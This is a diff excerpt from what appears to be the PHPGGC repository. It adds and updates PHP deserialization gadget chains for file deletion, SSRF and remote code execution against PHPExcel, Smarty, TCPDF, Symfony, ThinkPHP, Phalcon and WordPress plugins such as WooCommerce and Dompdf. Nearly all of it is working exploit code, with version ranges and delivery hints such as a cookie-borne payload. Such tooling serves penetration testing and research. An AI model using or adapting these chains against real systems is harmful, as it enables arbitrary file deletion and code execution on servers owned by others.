gadgetchains/PHPExcel/FD/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '1.8.2+';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
13 }
14 }
+21
-0
gadgetchains/PHPExcel/FD/1/gadgets.php less more
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
3 class PHPExcel_CachedObjectStorage_DiscISAM {
4 private $fileName = null;
5 private $fileHandle = 42;
6
7 public function __construct($filePath) {
8 $this->fileName = $filePath;
9 }
10
11 /*
12 public function __destruct() {
13 if (!is_null($this->fileHandle)) {
14 fclose($this->fileHandle); // Will only produce a warning
15 unlink($this->fileName);
16 }
17 $this->fileHandle = null;
18 }
19 */
20 }
+15
-0
gadgetchains/PHPExcel/FD/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD2 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 1.8.1';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']);
13 }
14 }
+21
-0
gadgetchains/PHPExcel/FD/2/gadgets.php less more
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
3 class PHPExcel_CachedObjectStorage_DiscISAM {
4 private $_fileName = null;
5 private $_fileHandle = 42;
6
7 public function __construct($filePath) {
8 $this->_fileName = $filePath;
9 }
10
11 /*
12 public function __destruct() {
13 if (!is_null($this->_fileHandle)) {
14 fclose($this->_fileHandle); // Will only produce a warning
15 unlink($this->_fileName);
16 }
17 $this->_fileHandle = null;
18 } // function __destruct()
19 */
20 }
+15
-0
gadgetchains/PHPExcel/FD/3/chain.php less more
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD3 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '1.8.2+';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
13 }
14 }
+20
-0
gadgetchains/PHPExcel/FD/3/gadgets.php less more
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
3 class PHPExcel_Shared_XMLWriter {
4 private $tempFileName = '';
5
6 public function __construct($filePath) {
7 $this->tempFileName = $filePath;
8 }
9
10 /*
11 public function __destruct()
12 {
13 // Unlink temporary files
14 if ($this->tempFileName != '') {
15 @unlink($this->tempFileName);
16 }
17 }
18 */
19 }
+15
-0
gadgetchains/PHPExcel/FD/4/chain.php less more
0 <?php
1
2 namespace GadgetChain\PHPExcel;
3
4 class FD4 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 1.8.1';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9
10 public function generate(array $parameters)
11 {
12 return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']);
13 }
14 }
+20
-0
gadgetchains/PHPExcel/FD/4/gadgets.php less more
0 <?php
1
2 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
3 class PHPExcel_Shared_XMLWriter {
4 private $_tempFileName = '';
5
6 public function __construct($filePath) {
7 $this->_tempFileName = $filePath;
8 }
9
10 /*
11 public function __destruct()
12 {
13 // Unlink temporary files
14 if ($this->_tempFileName != '') {
15 @unlink($this->_tempFileName);
16 }
17 }
18 */
19 }
+1
-1
gadgetchains/Phalcon/RCE/1/chain.php less more
66 public static $version = '<= 1.2.2';
77 public static $vector = '__wakeup';
88 public static $author = 'Raz0r';
9 public static $informations = '
9 public static $information = '
1010 This chain does not expect parameters, will eval() any code supplied in
1111 php://input (i.e. POST data). Requires allow_url_include = true.
1212 ';
+1
-2
gadgetchains/Phalcon/RCE/1/gadgets.php less more
00 <?php
11
2 namespace Phalcon\Di{
2 namespace Phalcon\Di {
33 class Service {
44 protected $_shared;
55 protected $_definition;
6969 }
7070 }
7171
72 ?>
+1
-1
gadgetchains/Pydio/Guzzle/RCE/1/chain.php less more
11
22 namespace GadgetChain\Pydio\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '< 8.2.2';
77 public static $vector = '__toString';
+1
-1
gadgetchains/Slim/RCE/1/chain.php less more
11
22 namespace GadgetChain\Slim;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '3.8.1';
77 public static $vector = '__toString';
+18
-0
gadgetchains/Smarty/FD/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\Smarty;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '?';
7 public static $vector = '__destruct';
8 public static $author = 'd3adc0de';
9 public static $parameters = [
10 'remote_file'
11 ];
12
13 public function generate(array $parameters)
14 {
15 return new \Smarty_Internal_Template($parameters['remote_file']);
16 }
17 }
+69
-0
gadgetchains/Smarty/FD/1/gadgets.php less more
0 <?php
1
2 abstract class Smarty_CacheResource
3 {
4 }
5
6 class Smarty_Internal_CacheResource_File extends Smarty_CacheResource
7 {
8 public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
9 {
10 $cached->is_locked = false;
11 unlink($cached->lock_id);
12 }
13 }
14
15 class Smarty_Template_Cached
16 {
17 public $lock_id = null;
18 public $is_locked = true;
19
20 public function __construct()
21 {
22 $this->handler = new Smarty_Internal_CacheResource_File();
23 $this->lock_id = '';
24 }
25
26 public function setlock($lock_id){
27 if($lock_id){
28 $this->lock_id = $lock_id;
29 }
30 }
31 }
32
33 class Smarty_Internal_TemplateBase
34 {
35 }
36
37 class Smarty extends Smarty_Internal_TemplateBase
38 {
39 public $cache_locking = true;
40 public $cache_dir;
41 public $use_sub_dirs;
42 public function __construct(){
43 $this->cache_locking = 1;
44 $this->cache_dir = "/";
45 $this->use_sub_dirs = true;
46 $this->cache = true;
47 }
48 }
49
50 class Smarty_Internal_Template extends Smarty_Internal_TemplateBase
51 {
52
53 public $cached;
54 public $smarty;
55
56 public function __construct($lock_id){
57 $this->smarty = new Smarty();
58 $this->cached = new Smarty_Template_Cached();
59 $this->setlock($lock_id);
60 }
61
62 public function setlock($lock_id){
63 $this->cached->setlock($lock_id);
64 }
65
66 }
67
68 ?>
+22
-0
gadgetchains/Smarty/SSRF/1/chain.php less more
0 <?php
1 namespace GadgetChain\Smarty;
2
3 class SSRF1 extends \PHPGGC\GadgetChain\SSRF
4 {
5 public static $version = '?';
6 public static $vector = '__destruct';
7 public static $foundby = 'unknown';
8 public static $author = 'mr_me';
9 public static $information = '
10 Reference: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Positive-Research-2014-eng.pdf (2014).
11 This was originally an XXE gadget chain, but it does not work on recent PHP versions.
12 Therefore, the gadget chain is now just an SSRF.
13 According to raz0r, it "works only in PHP <5.4.12/5.3.22".
14 ';
15
16 public function generate(array $parameters)
17 {
18 return new \Smarty_Internal_Template($parameters['uri']);
19 }
20 }
21 ?>
+31
-0
gadgetchains/Smarty/SSRF/1/gadgets.php less more
0 <?php
1 class Smarty_Template_Cached
2 {
3 public $is_locked = true;
4 public function __construct($url)
5 {
6 $res = parse_url($url);
7 $this->handler = new SoapClient(null, [
8 'uri' => $res['scheme'] . '://' . $res['host'] . '/',
9 'location' => $url
10 ]);
11 }
12 }
13
14 class Smarty
15 {
16 public $cache_locking = true;
17 }
18
19 class Smarty_Internal_Template
20 {
21 public $cached;
22 public $smarty;
23
24 public function __construct($url)
25 {
26 $this->smarty = new Smarty();
27 $this->cached = new Smarty_Template_Cached($url);
28 }
29 }
30 ?>
+1
-1
gadgetchains/Symfony/FW/1/chain.php less more
66 public static $version = '2.5.2';
77 public static $vector = 'DebugImport';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 This chain is supposed to be uploaded through the /_profiler/import
1111 page. It will produce an error but the file will be created in the
1212 webroot.
+2
-5
gadgetchains/Symfony/RCE/1/chain.php less more
11
22 namespace GadgetChain\Symfony;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
55 {
66 public static $version = '3.3';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
9 public static $informations = 'Executes given command through proc_open()';
10 public static $parameters = [
11 'command'
12 ];
9 public static $information = 'Executes given command through proc_open()';
1310
1411 public function generate(array $parameters)
1512 {
+2
-5
gadgetchains/Symfony/RCE/2/chain.php less more
11
22 namespace GadgetChain\Symfony;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '2.3.42 < 2.6';
77 public static $vector = '__destruct';
88 public static $author = 'crlf';
9 public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
10 public static $parameters = [
11 'code'
12 ];
9 public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
1310
1411 public function generate(array $parameters)
1512 {
+2
-5
gadgetchains/Symfony/RCE/3/chain.php less more
11
22 namespace GadgetChain\Symfony;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '2.6 <= 2.8.32';
77 public static $vector = '__destruct';
88 public static $author = 'crlf';
9 public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
10 public static $parameters = [
11 'code'
12 ];
9 public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )';
1310
1411 public function generate(array $parameters)
1512 {
+2
-2
gadgetchains/Symfony/RCE/4/chain.php less more
11
22 namespace GadgetChain\Symfony;
33
4 class RCE4 extends \PHPGGC\GadgetChain\RCE
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '3.4.0-34, 4.2.0-11, 4.3.0-7';
77 public static $vector = '__destruct';
88 public static $author = 'wisdomtree';
9 public static $informations = 'Execute $function with $parameter (CVE-2019-18889)';
9 public static $information = 'Execute $function with $parameter (CVE-2019-18889)';
1010 public static $parameters = [
1111 'function',
1212 'parameter'
+23
-0
gadgetchains/TCPDF/FD/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\TCPDF;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 6.3.5';
7 public static $vector = '__destruct';
8 public static $author = 'timoles';
9 public static $information = '
10 TCPDF contains the variable "imagekeys" which expects an array of strings. Upon __destruct an "unlink()" is
11 called on all filepaths within the imagekeys array.
12 ';
13
14 public function generate(array $parameters)
15 {
16 $file = $parameters['remote_file'];
17
18 return new \TCPDF(
19 $file
20 );
21 }
22 }
+11
-0
gadgetchains/TCPDF/FD/1/gadgets.php less more
0 <?php
1
2 class TCPDF {
3 protected $imagekeys;
4
5 function __construct($remote_file) {
6 $this->imagekeys = [
7 $remote_file
8 ];
9 }
10 }
+3
-2
gadgetchains/ThinkPHP/RCE/1/chain.php less more
11
22 namespace GadgetChain\ThinkPHP;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.1.x-5.2.x';
77 public static $vector = '__destruct';
88 public static $author = 'Smi1e';
9 public static $informations = '
9 public static $information = '
1010 This chain can only execute system().
1111 Because the second parameter is uncontrollable
1212 ';
13
1314 public function generate(array $parameters)
1415 {
1516 $function = $parameters['function'];
+26
-0
gadgetchains/WordPress/Dompdf/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\Dompdf;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '0.8.5+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = '
10 Tested up to WP 5.4.1 and Dompdf 0.8.5. Newest versions might also work.
11 Example of plugins using this library:
12 woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output)
13 advanced-cf7-db (lib only included when PDF generated)
14 ';
15
16 public function generate(array $parameters)
17 {
18 $function = $parameters['function'];
19 $parameter = $parameters['parameter'];
20
21 return new \Dompdf\Adapter\CPDF(
22 new \Requests_Utility_FilteredIterator([$parameter], $function)
23 );
24 }
25 }
+44
-0
gadgetchains/WordPress/Dompdf/RCE/1/gadgets.php less more
0 <?php
1
2 namespace
3 {
4 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
5 }
6
7 namespace Dompdf\Adapter
8 {
9 // https://github.com/dompdf/dompdf/blob/master/src/Adapter/CPDF.php
10 class CPDF
11 {
12 // Since 0.8.5, this attribute is protected (was private before)
13 protected $_image_cache;
14
15 // Custom contrustor to set the payload
16 public function __construct($image_cache)
17 {
18 $this->_image_cache = $image_cache;
19 }
20
21 /*
22 public function __destruct()
23 {
24 foreach ($this->_image_cache as $img) {
25 // The file might be already deleted by 3rd party tmp cleaner,
26 // the file might not have been created at all
27 // (if image outputting commands failed)
28 // or because the destructor was called twice accidentally.
29 if (!file_exists($img)) {
30 continue;
31 }
32
33 if ($this->_dompdf->getOptions()->getDebugPng()) {
34 print '[__destruct unlink ' . $img . ']';
35 }
36 if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) {
37 unlink($img);
38 }
39 }
40 }
41 */
42 }
43 }
+26
-0
gadgetchains/WordPress/Dompdf/RCE/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\Dompdf;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '0.7.0 <= 0.8.4 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = '
10 Tested up to WP 5.4.1 and Dompdf 0.8.4.
11 Example of plugins using this library:
12 woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output)
13 advanced-cf7-db (lib only included when PDF generated)
14 ';
15
16 public function generate(array $parameters)
17 {
18 $function = $parameters['function'];
19 $parameter = $parameters['parameter'];
20
21 return new \Dompdf\Adapter\CPDF(
22 new \Requests_Utility_FilteredIterator([$parameter], $function)
23 );
24 }
25 }
+43
-0
gadgetchains/WordPress/Dompdf/RCE/2/gadgets.php less more
0 <?php
1
2 namespace
3 {
4 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
5 }
6
7 namespace Dompdf\Adapter
8 {
9 // https://github.com/dompdf/dompdf/blob/v0.8.4/src/Adapter/CPDF.php
10 class CPDF
11 {
12 private $_image_cache;
13
14 // Custom contrustor to set the payload
15 public function __construct($image_cache)
16 {
17 $this->_image_cache = $image_cache;
18 }
19
20 /*
21 public function __destruct()
22 {
23 foreach ($this->_image_cache as $img) {
24 // The file might be already deleted by 3rd party tmp cleaner,
25 // the file might not have been created at all
26 // (if image outputting commands failed)
27 // or because the destructor was called twice accidentally.
28 if (!file_exists($img)) {
29 continue;
30 }
31
32 if ($this->_dompdf->getOptions()->getDebugPng()) {
33 print '[__destruct unlink ' . $img . ']';
34 }
35 if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) {
36 unlink($img);
37 }
38 }
39 }
40 */
41 }
42 }
+3
-3
gadgetchains/WordPress/Guzzle/RCE/1/chain.php less more
11
22 namespace GadgetChain\WordPress\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0 <= 6.4.1+';
6 public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2';
77 public static $vector = '__toString';
88 public static $author = 'erwan_lr';
9 public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
9 public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
1010
1111 public function generate(array $parameters)
1212 {
+3
-3
gadgetchains/WordPress/Guzzle/RCE/2/chain.php less more
11
22 namespace GadgetChain\WordPress\Guzzle;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0 <= 6.4.1+';
6 public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'Kevinlpd';
9 public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
9 public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.';
1010
1111 public function generate(array $parameters)
1212 {
+19
-0
gadgetchains/WordPress/P/EmailSubscribers/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\P\EmailSubscribers;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '4.0 <= 4.4.7+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.4.1 and EmailSubscribers 4.4.7. Newest versions might also work.';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \IG_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
17 }
18 }
+23
-0
gadgetchains/WordPress/P/EmailSubscribers/RCE/1/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // EmailSubsribers - https://plugins.svn.wordpress.org/email-subscribers/trunk/lite/includes/logs/log-handlers/class-ig-log-handler-file.php
5 class IG_Log_Handler_File {
6 protected $handles = array();
7
8 // Custom constructor to set the $handles more easily
9 public function __construct($handles) {
10 $this->handles = $handles;
11 }
12
13 /*
14 public function __destruct() {
15 foreach ( $this->handles as $handle ) {
16 if ( is_resource( $handle ) ) {
17 fclose( $handle ); // @codingStandardsIgnoreLine.
18 }
19 }
20 }
21 */
22 }
+20
-0
gadgetchains/WordPress/P/EverestForms/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\P\EverestForms;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.0 <= 1.6.7+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work.
10 ';
11
12 public function generate(array $parameters)
13 {
14 $function = $parameters['function'];
15 $parameter = $parameters['parameter'];
16
17 return new \EVF_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
18 }
19 }
+23
-0
gadgetchains/WordPress/P/EverestForms/RCE/1/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // EverestForms - https://plugins.svn.wordpress.org/everest-forms/trunk/includes/log-handlers/class-evf-log-handler-file.php
5 class EVF_Log_Handler_File {
6 protected $handles = array();
7
8 // Custom constructor to set the $handles more easily
9 public function __construct($handles) {
10 $this->handles = $handles;
11 }
12
13 /*
14 public function __destruct() {
15 foreach ( $this->handles as $handle ) {
16 if ( is_resource( $handle ) ) {
17 fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose
18 }
19 }
20 }
21 */
22 }
+4
-4
gadgetchains/WordPress/P/WooCommerce/RCE/1/chain.php less more
11
22 namespace GadgetChain\WordPress\P\WooCommerce;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '3.4.0 <= 3.6.2+';
6 public static $version = '3.4.0 <= 4.1.0+ & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = '
9 public static $information = '
1010 Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763
11 Tested up to WP 5.2 and WooCommerce 3.6.2 activated (but not configured). Newest versions might also work.
11 Tested up to WP 5.4.1 and WooCommerce 4.1.0 activated (but not configured). Newest versions might also work.
1212 ';
1313
1414 public function generate(array $parameters)
+23
-0
gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\P\WooCommerce;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 3.4.0 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'Vincent Ulitzsch(@vinulium) and Pascal Zenker (@parzel2), based on WooCommerce RCE by erwan_lr';
9 public static $information = '
10 Simple adaption of the gadgetchain demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763.
11 Original chain by erwan_lr.
12 Tested up to WP 5.1.1 and WooCommerce 3.4.0 activated (but not configured).
13 ';
14
15 public function generate(array $parameters)
16 {
17 $function = $parameters['function'];
18 $parameter = $parameters['parameter'];
19
20 return new \WC_Logger(new \Requests_Utility_FilteredIterator([$parameter], $function));
21 }
22 }
+15
-0
gadgetchains/WordPress/P/WooCommerce/RCE/2/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 // WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php
5 class WC_Logger
6 {
7 private $_handles;
8
9 // Custom constructor to set the $handles more easily
10 public function __construct($handles)
11 {
12 $this->_handles = $handles;
13 }
14 }
+3
-3
gadgetchains/WordPress/P/YetAnotherStarsRating/RCE/1/chain.php less more
11
22 namespace GadgetChain\WordPress\P\YetAnotherStarsRating;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '? <= 1.8.6';
6 public static $version = '? <= 1.8.6 & WP < 5.5.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = 'Paylaod has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings';
9 public static $information = 'Payload has to be in the COOKIE yasr_visitor_vote_cookie in a page containing the shortcode of the plugin allowing visitor ratings';
1010
1111 public function generate(array $parameters)
1212 {
+21
-0
gadgetchains/WordPress/PHPExcel/RCE/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__toString';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_RichText(
17 new \Requests_Utility_FilteredIterator([$parameter], $function)
18 );
19 }
20 }
+31
-0
gadgetchains/WordPress/PHPExcel/RCE/1/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
+21
-0
gadgetchains/WordPress/PHPExcel/RCE/2/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__toString';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_RichText(
17 new \Requests_Utility_FilteredIterator([$parameter], $function)
18 );
19 }
20 }
+31
-0
gadgetchains/WordPress/PHPExcel/RCE/2/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
+23
-0
gadgetchains/WordPress/PHPExcel/RCE/3/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_CachedObjectStorage_DiscISAM(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
+51
-0
gadgetchains/WordPress/PHPExcel/RCE/3/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
33 class PHPExcel_CachedObjectStorage_DiscISAM {
34 private $fileName = null;
35 private $fileHandle = 42;
36
37 public function __construct($filePath) {
38 $this->fileName = $filePath;
39 }
40
41 /*
42 public function __destruct() {
43 if (!is_null($this->fileHandle)) {
44 fclose($this->fileHandle); // Will only produce a warning
45 unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 $this->fileHandle = null;
48 }
49 */
50 }
+23
-0
gadgetchains/WordPress/PHPExcel/RCE/4/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_CachedObjectStorage_DiscISAM(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
+51
-0
gadgetchains/WordPress/PHPExcel/RCE/4/gadgets.php less more
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
33 class PHPExcel_CachedObjectStorage_DiscISAM {
34 private $_fileName = null;
35 private $_fileHandle = 42;
36
37 public function __construct($filePath) {
38 $this->_fileName = $filePath;
39 }
40
41 /*
42 public function __destruct() {
43 if (!is_null($this->_fileHandle)) {
44 fclose($this->_fileHandle); // Will only produce a warning
45 unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 $this->fileHandle = null;
48 }
49 */
50 }
+23
-0
gadgetchains/WordPress/PHPExcel/RCE/5/chain.php less more
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
